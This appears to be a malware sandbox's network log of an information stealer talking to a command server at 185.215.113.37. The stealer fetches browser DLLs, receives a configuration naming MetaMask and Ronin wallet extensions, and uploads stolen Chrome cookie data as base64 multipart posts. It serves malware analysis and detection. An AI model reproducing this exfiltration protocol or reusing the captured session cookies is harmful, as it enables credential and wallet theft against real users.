Oct 3, 2024 21:36:04.645040989 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 3, 2024 21:36:04.671720028 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA Host: 185.215.113.37 Content-Length: 7035 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2024 21:36:04.671956062 CEST	7035	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 3, 2024 21:36:05.532989979 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:05.786870003 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:06.097534895 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:06.175669909 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 3, 2024 21:36:06.175685883 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 3, 2024 21:36:06.175702095 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 3, 2024 21:36:06.178289890 CEST	1236	IN	Data Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31 Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
Oct 3, 2024 21:36:07.653165102 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------KJKKKJJJKJKFHJJJJECB--
Oct 3, 2024 21:36:08.387473106 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:08.526830912 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file"------BGCFBGDHJKFIEBFIECGH--
Oct 3, 2024 21:36:09.243246078 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:09.689912081 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file"------FIJKEHJJDAAKFHIDAKFH--
Oct 3, 2024 21:36:10.404055119 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:10.902854919 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:11.162844896 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 3, 2024 21:36:11.995548964 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:12.229640007 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 3, 2024 21:36:13.184343100 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:13.405946970 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 3, 2024 21:36:13.720032930 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:13.942037106 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 3, 2024 21:36:15.396500111 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:15.618776083 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 3, 2024 21:36:15.936187983 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 21:36:16.158689022 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 3, 2024 21:36:16.866852045 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2024 21:36:17.608968973 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 19:36:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 21:36:17.666837931 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 